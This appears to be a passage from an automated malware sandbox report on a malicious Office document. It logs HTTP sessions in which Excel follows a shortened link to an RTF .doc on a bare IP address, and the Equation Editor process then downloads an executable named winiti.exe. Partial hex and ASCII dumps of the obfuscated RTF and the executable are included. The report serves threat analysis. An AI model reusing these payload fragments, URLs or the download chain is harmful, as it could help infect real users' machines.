                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: tny.wtf
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:19.673207998 CEST727INHTTP/1.1 302 Found
                        Date: Fri, 26 Jul 2024 11:40:19 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Location: http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fp7O6aGpmcyE4iP%2FKFZIvwnI%2F4G2s%2FaEiLzgN0U2yJJe8Y5fyxRQs%2FyDmi1gyjZOT1q%2BCg0Kd4MeYlIuOpOwVnLcGi1Uirrr1mrYBtOe%2F3tz7WfQljcP5J%2BI"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d3a8ebdc40c-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.2249162104.219.239.104801892C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampBytes transferredDirectionData
                        Jul 26, 2024 13:40:19.699269056 CEST448OUTGET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 104.219.239.104
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:20.214741945 CEST1236INHTTP/1.1 200 OK
                        Date: Fri, 26 Jul 2024 11:40:20 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        Last-Modified: Fri, 26 Jul 2024 01:46:43 GMT
                        ETag: "14857-61e1caef74ae3"
                        Accept-Ranges: bytes
                        Content-Length: 84055
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/msword
                        Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 67 72 6f 75 70 54 6f 70 39 32 30 34 34 33 31 37 32 20 5c 28 7d 0d 7b 5c 36 36 34 31 31 36 38 35 34 2f 3c 60 3f 32 3a b0 7e 35 37 24 2d 7c 2d 2b 5d 2c 7c 32 2f 3f 35 24 2c 3b 5e 3f 2b 21 2e 38 2f b0 7e 5d 25 a7 2e a7 36 5e 33 2f 3b 38 a7 34 23 5b a7 2e 3f 3e 29 3a 35 40 32 3d 3f 30 3f 3f 39 37 28 2b b5 36 b5 23 2b 60 27 35 3a 29 3b 2a 28 35 3f 3f 40 37 b0 3b 36 3f 26 34 25 3a 32 35 5b 37 35 36 3f 31 3f 5e 5d b0 26 5b 26 26 26 2b 2a 3e 37 2d 25 31 3f 38 3f 25 36 24 2a 21 3b 7c 23 3f 5f 32 30 3d 2f 21 7e 2b 27 25 3f 3a 3f 25 5b 34 27 5d 3f 2f 2c 7c 3f 60 38 28 3f 5f 23 2f 29 31 7c 3e 39 25 2d 60 60 60 36 a7 36 34 3b 30 37 33 2a 25 25 2c 24 3f 33 25 3c 2f 27 27 40 2f 5f 39 27 a7 3f b0 34 60 5f 2c 23 31 24 60 3e 35 23 2a 3f 36 3c 7e 3c 27 3f 3d 3b 26 25 30 26 23 3f 2f b5 3f 2a 24 3f b5 26 2e 2e 37 5d 23 3f a7 3f 7e 3f 25 2c 3f 23 38 2f 27 26 29 3a 3f b5 34 24 3f 37 37 2a 34 2a 5e 37 30 3f 36 3f 2d a7 a7 29 5e 5f 60 3f 39 3d 3a 25 60 a7 [TRUNCATED]
                        Data Ascii: {\rtf1{\*\groupTop920443172 \(}{\664116854/<`?2:~57$-|-+],|2/?5$,;^?+!.8/~]%.6^3/;84#[.?>):5@2=?0??97(+6#+`'5:);*(5??@7;6?&4%:25[756?1?^]&[&&&+*>7-%1?8?%6$*!;|#?_20=/!~+'%?:?%[4']?/,|?`8(?_#/)1|>9%-```664;073*%%,$?3%</''@/_9'?4`_,#1$`>5#*?6<~<'?=;&%0&#?/?*$?&..7]#??~?%,?#8/'&):?4$?77*4*^70?6?-)^_`?9=:%`.|$+?]'0~]_1,;!7~??29`;:?<?_[^?5*@_0_6*,?>;-?>10@|@*=*?!>,]`2,':**[3#7]?8>2$~@1?,-%?7'<&@+)|-'*!4!2&?72&=5]#/?`_|&,-)$@9_2$,&+)7`2>/%<?#+&_`:3^/'1=2%-'7`%5%.99?6+%`+0?>1$%8_%?%0[)()!<%*?%&~-#9??:&!-5~2#10]|?7('?~^[6.-'`$)=`%?97(9<5;-6?@~?0[.00`%3+#4`8.48,>-?_@%>7[!~7?)86,)@*&/?7`!-$%;21>2&<-%[5-/|&+:7@2!4+~`[?=@'=+(?,1/&!|>1.&,5'&|4:*3|7.~+,,=*~@[36%/!&(#&`..?8-1?*(_)_,8#]'=.!?_%?%?,94***?4[-5$$?6==,=''1~%*~.,25~;=7`[<*]87/?.;89[>).|;?8^??5:^:0^*]07?9??*/+?<@6727:?_!>+?`-8%?'':)8`>--#7(/3)]??%@6%68<~)16!|:%|^?>4=4:[;_?@'^>`#1$?%/3^
                        Jul 26, 2024 13:40:20.215567112 CEST1236INData Raw: 3b b5 3d 60 5e b5 24 3e 3c 3f 5e 2e 2e 5d 3a 2b b0 2f 37 2f 37 b5 3c 32 36 24 35 3d 3f 3f 2a 7e 31 39 2d 7c 36 7c 24 3f 35 2f 21 28 35 38 2c 60 3f 2e 36 3a 29 31 5f 35 29 5b 7c 3f 2f 27 2d 30 3a 3a 38 3f b0 39 27 35 32 28 3a 25 7e 32 32 2b 34 29
                        Data Ascii: ;=`^$><?^..]:+/7/7<26$5=??*~19-|6|$?5/!(58,`?.6:)1_5)[|?/'-0::8?9'52(:%~22+4))&3*(__?`]-?7?[_4!)`.([>_?%?.%|1*0;*0^&8;#_~;7%`>~-48?*:|0]%?`._<[5942/=&3,-%&'|;?&?8*:/<,(1_?=]6$_=|?-=3#1[<$!06`.++!>%?~13#<!(<3_8$7?@!)(;0[@|][|6[
                        Jul 26, 2024 13:40:20.215594053 CEST448INData Raw: 25 3f 3b 5f 3f 27 33 7c 60 3f 7c 3f 39 40 38 40 2d 2c 5f b5 5d 5f 3f 60 2e a7 40 b5 37 31 30 3f 3f 27 3d 30 24 b5 23 5b b0 3b 2d 35 36 2f 34 21 60 25 23 3e 2a 5f 27 3b 25 3f 3c b5 2b 2f b0 b0 33 37 2d 2e 60 37 2d 24 a7 5b 28 40 2b 3f 35 2d 3f 33
                        Data Ascii: %?;_?'3|`?|?9@8@-,_]_?`.@710??'=0$#[;-56/4!`%#>*_';%?<+/37-.`7-$[(@+?5-?3)(_~+%,?%<[>@;%4-05:?:<3_9%2#-[32?;4::&;@,1_%.6?2*6,?1:$@;4-''5.-*!&&[=-57/~43(?-/783.?7]5+^|#?;8??`1?/`5(*)~738;94?@+_;1)(?~,?9%%%-#%[,<02_$40?0%)-19
                        Jul 26, 2024 13:40:20.218549967 CEST1236INData Raw: b5 31 7e 34 2e 3d 25 36 2c 40 5f 33 3f 3f 7e b5 34 26 3f 5d 7e 25 3f 25 3c 3a 5b 3b 30 3e 3c 27 26 3c 3f b0 29 27 2e 5b 27 2d 25 2a 32 b0 5e 7e 2b 2c 21 b0 3f 2d 3f 39 3b 5f b0 29 40 2a 2d 37 39 2b 33 28 7e 2a 3a 36 35 27 34 25 3b 2a 24 25 26 32
                        Data Ascii: 1~4.=%6,@_3??~4&?]~%?%<:[;0><'&<?)'.['-%*2^~+,!?-?9;_)@*-79+3(~*:65'4%;*$%&2&.*~?15_+|@)&~^30:?2*?.'5>$77)@;#~?/%?,7_5/#[.@+8)<%;!43^?|!3$=<?:23&+`[|.-7???24!>(.&)&^,9%'(3*3'!|_?67`&4%')6??>50+<(!?^9-2())6^$?0??77!,::]/#]1/3?$?
                        Jul 26, 2024 13:40:20.218569994 CEST1236INData Raw: 3c 2e 31 3f 2f 5d 2f 3c 7e 5e 3c b0 2f 34 28 b5 31 7e b0 35 27 5b 30 38 27 23 36 5d 3f 3a 3f b0 2f 23 38 32 27 2e 3f 38 a7 25 40 7e 34 3f 26 60 2c 3a 5c 6f 62 6a 65 63 74 37 39 31 34 33 39 38 30 5c 6f 62 6a 6c 69 6e 6b 37 30 35 36 35 31 31 39 5c
                        Data Ascii: <.1?/]/<~^</4(1~5'[08'#6]?:?/#82'.?8%@~4?&`,:\object79143980\objlink70565119\objw3618\objh1026{\*\objupdate43144314\*\objdata438390{\*\fname389511342 \bin00\148627455622895832}{\*\protusertbl806146736 \bin00\730357701817524428}\protleve
                        Jul 26, 2024 13:40:20.222795963 CEST1236INData Raw: 0d 0a 0a 0d 0a 0d 0a 0a 0d 37 35 36 0d 0a 0d 0a 0a 0a 0d 0d 0a 0d 0a 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 31 35 34 09 09 20 20 20 20 09 20 09 20 20 09 09 20 09 20 09 09 09 20 09 20 20 09 20 09 09 20 09 09 20 20 20 20 20 20 09 20 09 20 09 09 20 09 09 09
                        Data Ascii: 756154 49 6f4e2e33
                        Jul 26, 2024 13:40:20.222826958 CEST1236INData Raw: 20 09 20 20 20 20 09 09 20 09 09 20 09 09 09 09 20 20 09 09 20 20 20 09 09 20 20 09 38 34 37 0a 0a 0d 0d 0d 0a 0a 0a 0a 0d 0d 0d 0a 0d 0a 0a 0a 0a 0a 0d 0d 30 66 0a 0d 0a 0d 0a 0d 0d 0d 0d 0d 0d 0d 0a 0d 0a 0a 0a 0a 0a 0d 0d 33 38 31 63 0d 0d 0a
                        Data Ascii: 8470f381c5 f 638d
                        Jul 26, 2024 13:40:20.227536917 CEST1236INData Raw: 63 0a 0d 0d 0d 0d 0d 0a 0a 0d 0d 0d 0d 0a 0d 0d 0a 0d 0a 0d 0d 0d 36 0d 0a 0a 0d 0d 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 0a 0a 0a 0a 0a 0d 31 0d 0d 0d 0d 0d 0d 0d 0a 0a 0a 0a 0a 0a 0d 0a 0a 0a 0a 0a 0a 0d 37 37 09 09 20 09 20 20 20 20 09 09 09 09 09 20
                        Data Ascii: c6177 2ffe09 0e
                        Jul 26, 2024 13:40:20.227555990 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 09 20 20 20 20 20 09 09 09 09 09 09 09 20 20 09 09 31 30 0a 0d 0d 0a 0a 0d 0d 0a 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0a 0d 0d 62 0d 0d 0a 0a 0a 0a 0a 0a 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0a 0d 0d 66 0a 0d 0d 0a 0a 0a 0d 0d 0d 0d
                        Data Ascii: 10bfd1c2 2174
                        Jul 26, 2024 13:40:20.232242107 CEST1236INData Raw: 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0a 0a 0d 0d 37 32 20 09 09 20 20 20 20 09 20 09 20 20 20 20 20 20 20 20 09 20 20 20 20 09 09 20 20 20 20 09 09 09 20 20 20 09 20 09 09 09 09 20 09 20 20 20 20 09 09 20 20 20 20 20 20 20 09 09 20 20 09 20 20 09 09 20
                        Data Ascii: 72 c 0 687
                        Jul 26, 2024 13:40:20.232275963 CEST1236INData Raw: 09 09 20 20 09 09 20 09 09 20 09 09 20 20 20 09 09 09 20 20 09 20 20 09 20 20 09 09 09 32 38 61 0a 0a 0a 0a 0d 0d 0d 0a 0a 0d 0a 0a 0d 0d 0d 0a 0d 0d 0d 0d 0d 31 35 36 09 09 09 09 20 20 09 09 20 09 09 20 09 20 20 20 20 20 09 09 09 20 20 09 20 20
                        Data Ascii: 28a156 e 95e78bf


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.2249163188.114.97.3801012C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        TimestampBytes transferredDirectionData
                        Jul 26, 2024 13:40:20.686238050 CEST129OUTOPTIONS / HTTP/1.1
                        User-Agent: Microsoft Office Protocol Discovery
                        Host: tny.wtf
                        Content-Length: 0
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:21.234082937 CEST562INHTTP/1.1 404 Not Found
                        Date: Fri, 26 Jul 2024 11:40:21 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUDIJoRUGvNJ0PNTuX7ZUsOG4uZhD8nTjir3U26jCZtfdcUpt6EmhafoL32hISzG0PbtgJUL0prVl%2Fji9sHwKu5fBApgukv%2Br9j%2Fzuq4ZC0URzfg%2BiMWXLxb"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d47ceed5e79-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0
                        Jul 26, 2024 13:40:21.686033010 CEST129OUTOPTIONS / HTTP/1.1
                        User-Agent: Microsoft Office Protocol Discovery
                        Host: tny.wtf
                        Content-Length: 0
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:21.830341101 CEST560INHTTP/1.1 404 Not Found
                        Date: Fri, 26 Jul 2024 11:40:21 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=plG0JCxoAKlGuo26MmlKyEXJVvVj%2Bf8tpWJBrWUSZ3eXFfejgYUVbeskNpEmJSH%2BakRDz19hd20DkL%2FpH1JaNAwp5VGCQQPRxFCVOvviqJ2ml9WAn2waQIV3"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d4bd98e5e79-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0
                        Jul 26, 2024 13:40:21.839262009 CEST129OUTOPTIONS / HTTP/1.1
                        User-Agent: Microsoft Office Protocol Discovery
                        Host: tny.wtf
                        Content-Length: 0
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:21.984366894 CEST564INHTTP/1.1 404 Not Found
                        Date: Fri, 26 Jul 2024 11:40:21 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4C56WPN0iN%2BgthEsRjYJrauRNBV%2Fd69qyhca%2BS7uZjfxTCL8Vo3zKLLqIuYan2fHzuwtUXcrHOw9DLlQOPcmMGD%2BkuYSBo2Vv%2Fzf2FhSQMa3CYQyt1MXo6V2"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d4cca2b5e79-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0
                        Jul 26, 2024 13:40:26.929503918 CEST130OUTHEAD /dGa HTTP/1.1
                        User-Agent: Microsoft Office Existence Discovery
                        Host: tny.wtf
                        Content-Length: 0
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:27.074498892 CEST546INHTTP/1.1 405 Method Not Allowed
                        Date: Fri, 26 Jul 2024 11:40:27 GMT
                        Connection: keep-alive
                        Allow: GET
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEjlQM1F9ImZiq8j7xA95p2q2ih0%2BVtNAk4zH2SW5kxe%2FbNi4uggTZreIY0wdKVOCHG1MUQcEHZ6S9X519T5i8qFEo1YdAegh9Vg98AB1Sjt0ojVRpptG03P"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d6c9ac65e79-EWR
                        alt-svc: h3=":443"; ma=86400


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.2249164188.114.96.3801012C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        TimestampBytes transferredDirectionData
                        Jul 26, 2024 13:40:22.421689987 CEST111OUTHEAD /dGa HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Microsoft Office Existence Discovery
                        Host: tny.wtf
                        Jul 26, 2024 13:40:23.001195908 CEST556INHTTP/1.1 405 Method Not Allowed
                        Date: Fri, 26 Jul 2024 11:40:22 GMT
                        Connection: keep-alive
                        Allow: GET
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ikjItfhHyvj6dW0nsuVBnYXWooGEWIslrDITK4RVBT3%2BvTI6fFxh7n6HmJVKsVDHAbQYo2f%2BcZiyPxe3hS66Dxs%2BUhcaL%2FHPFlxfs5dL%2Fd%2F%2BKKPgfUi4ysE"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d52cbee42de-EWR
                        alt-svc: h3=":443"; ma=86400


                        Session IDSource IPSource PortDestination IPDestination Port
                        4192.168.2.2249165188.114.96.380
                        TimestampBytes transferredDirectionData
                        Jul 26, 2024 13:40:26.251523972 CEST124OUTOPTIONS / HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                        translate: f
                        Host: tny.wtf
                        Jul 26, 2024 13:40:26.834196091 CEST564INHTTP/1.1 404 Not Found
                        Date: Fri, 26 Jul 2024 11:40:26 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DK4%2FPYBA3If48iGooDP%2FeqPPqpoWJk9HuUhYKOLu4FxKJSb9kjv1sVS5SkTDG5iGgEFUGpvLyB0MYLuJxNFIpYgJowS%2FFE2o9HXFcYNFfo9Nom4%2BMylFrR%2B"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d6abcb67ca2-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0
                        Jul 26, 2024 13:40:27.044694901 CEST564INHTTP/1.1 404 Not Found
                        Date: Fri, 26 Jul 2024 11:40:26 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DK4%2FPYBA3If48iGooDP%2FeqPPqpoWJk9HuUhYKOLu4FxKJSb9kjv1sVS5SkTDG5iGgEFUGpvLyB0MYLuJxNFIpYgJowS%2FFE2o9HXFcYNFfo9Nom4%2BMylFrR%2B"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d6abcb67ca2-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.2249166104.219.239.104801256C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        TimestampBytes transferredDirectionData
                        Jul 26, 2024 13:40:27.540389061 CEST315OUTGET /80/winiti.exe HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 104.219.239.104
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:28.012634039 CEST1236INHTTP/1.1 200 OK
                        Date: Fri, 26 Jul 2024 11:40:27 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        Last-Modified: Tue, 16 Jul 2024 19:13:36 GMT
                        ETag: "e8400-61d6224798859"
                        Accept-Ranges: bytes
                        Content-Length: 951296
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/x-msdownload
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`f0x @ @O(mT H.text$v x `.rsrcz@@.reloc@BHLUIPZ}rp}}((*}rp}}((}*0rpsorpssso&oo}{{oo( &o!*_b tw0{rpo"{rpo"{
                        Jul 26, 2024 13:40:28.012693882 CEST1236INData Raw: 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 1d 00 00 04 02 7b 1e 00 00 04 16 25 0a 6f 23 00 00 0a 00 06 6f 23 00 00 0a 00 02 7b 12 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 11 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 17 00 00 04 72
                        Data Ascii: rpo"{{%o#o#{rpo"{rpo"{rpo"{rpo"{"{!%o#o#{rpo"*&(*0k{'o${o${o${o${o$
                        Jul 26, 2024 13:40:28.012713909 CEST1236INData Raw: 27 00 00 04 16 6f 24 00 00 0a 00 02 7b 06 00 00 04 17 6f 24 00 00 0a 00 02 7b 14 00 00 04 17 6f 24 00 00 0a 00 02 7b 13 00 00 04 17 6f 24 00 00 0a 00 02 7b 15 00 00 04 17 6f 24 00 00 0a 00 02 7b 28 00 00 04 16 6f 24 00 00 0a 00 02 7b 2a 00 00 04
                        Data Ascii: 'o${o${o${o${o${(o${*o$*0{o%rp(09{o%rp(09{o%rp(09{o1-{o19{o%rp(0,v{o
                        Jul 26, 2024 13:40:28.015784025 CEST672INData Raw: 20 00 00 0a 26 00 de 00 2a 01 10 00 00 00 00 01 00 39 3a 00 11 20 00 00 01 13 30 02 00 2b 00 00 00 02 00 00 11 00 03 2c 0b 02 7b 05 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 05 00 00 04 6f 36 00 00 0a 00 00 02 03 28 37 00 00 0a 00 2a 00 13
                        Data Ascii: &*9: 0+,{+,{o6(7*0(8s9s:}s;}s<}s<}s;}s<}s;}s<}s;}s<}s<}s;}
                        Jul 26, 2024 13:40:28.015803099 CEST1236INData Raw: 00 02 7b 06 00 00 04 18 18 18 18 73 4a 00 00 0a 6f 4b 00 00 0a 00 02 7b 06 00 00 04 72 bf 05 00 70 6f 4c 00 00 0a 00 02 7b 06 00 00 04 17 6f 4d 00 00 0a 00 02 7b 06 00 00 04 1f 33 6f 4e 00 00 0a 00 02 7b 06 00 00 04 6f 4f 00 00 0a 1f 18 6f 50 00
                        Data Ascii: {sJoK{rpoL{oM{3oN{oOoP{oQ{ d sRoS{oT{sUoV{rp"AsWoX{sHoI{sJoK{rp
                        Jul 26, 2024 13:40:28.018591881 CEST1236INData Raw: 02 7b 0e 00 00 04 72 bd 06 00 70 6f 4c 00 00 0a 00 02 7b 0e 00 00 04 20 05 03 00 00 1f 23 73 52 00 00 0a 6f 53 00 00 0a 00 02 7b 0e 00 00 04 1d 6f 54 00 00 0a 00 02 7b 0e 00 00 04 02 fe 06 0d 00 00 06 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 7b 0f 00
                        Data Ascii: {rpoL{ #sRoS{oT{s[o\{oY{rp"AsZoX{ sHoI{sJoK{rpoL{ sRoS{oT{rpo"{
                        Jul 26, 2024 13:40:28.018610954 CEST1236INData Raw: 00 00 0a 00 02 7b 15 00 00 04 02 fe 06 08 00 00 06 73 5b 00 00 0a 6f 62 00 00 0a 00 02 7b 16 00 00 04 17 6f 59 00 00 0a 00 02 7b 16 00 00 04 72 d9 05 00 70 22 00 00 90 41 17 73 5a 00 00 0a 6f 58 00 00 0a 00 02 7b 16 00 00 04 1f 09 20 66 02 00 00
                        Data Ascii: {s[ob{oY{rp"AsZoX{ fsHoI{sJoK{rpoL{_sRoS{oT{rpo"{rp"AsWoX{ sHoI{
                        Jul 26, 2024 13:40:28.019581079 CEST1236INData Raw: 6f 59 00 00 0a 00 02 7b 1e 00 00 04 72 d9 05 00 70 22 00 00 90 41 18 19 16 73 57 00 00 0a 6f 58 00 00 0a 00 02 7b 1e 00 00 04 1f 68 18 73 48 00 00 0a 6f 49 00 00 0a 00 02 7b 1e 00 00 04 18 18 18 18 73 4a 00 00 0a 6f 4b 00 00 0a 00 02 7b 1e 00 00
                        Data Ascii: oY{rp"AsWoX{hsHoI{sJoK{rpoL{q!sRoS{oT{od{r:po"{oa{oe{of{oe{of{rp"AsWo
                        Jul 26, 2024 13:40:28.019619942 CEST1236INData Raw: 09 00 70 6f 4c 00 00 0a 00 02 7b 25 00 00 04 20 da 00 00 00 1f 7a 73 52 00 00 0a 6f 53 00 00 0a 00 02 7b 25 00 00 04 1a 6f 6b 00 00 0a 00 02 7b 25 00 00 04 1f 1f 6f 6c 00 00 0a 00 02 7b 25 00 00 04 16 6f 6d 00 00 0a 00 02 7b 26 00 00 04 17 6f 59
                        Data Ascii: poL{% zsRoS{%ok{%ol{%om{&oY{&rp"AsZoX{& sHoI{&sJoK{&r7poL{& sRoS{& oT{&rGpo"{'oe
                        Jul 26, 2024 13:40:28.019638062 CEST1236INData Raw: 0a 02 7b 29 00 00 04 6f 66 00 00 0a 00 02 28 65 00 00 0a 02 7b 28 00 00 04 6f 66 00 00 0a 00 02 28 65 00 00 0a 02 7b 26 00 00 04 6f 66 00 00 0a 00 02 28 65 00 00 0a 02 7b 25 00 00 04 6f 66 00 00 0a 00 02 28 65 00 00 0a 02 7b 24 00 00 04 6f 66 00
                        Data Ascii: {)of(e{(of(e{&of(e{%of(e{$of(e{#of(e{of(e{of(e{of(e{of(e{of(e{of(e{of(e{of
                        Jul 26, 2024 13:40:28.021492958 CEST1236INData Raw: 00 0a 19 6f 2c 00 00 0a 6f 2d 00 00 0a 28 80 00 00 0a 02 7b 2e 00 00 04 6f 7e 00 00 0a 07 6f 7f 00 00 0a 6f 2b 00 00 0a 1a 6f 2c 00 00 0a 6f 2d 00 00 0a 28 80 00 00 0a 5a 58 0a 00 07 17 58 0b 07 02 7b 2e 00 00 04 6f 7e 00 00 0a 6f 81 00 00 0a fe
                        Data Ascii: o,o-({.o~oo+o,o-(ZXX{.o~o-{O(o"*0L{+o3rp{/o%(4o5{.oo( &*9: 0{,{.o


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:07:39:58
                        Start date:26/07/2024
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Imagebase:0x13f0c0000
                        File size:28'253'536 bytes
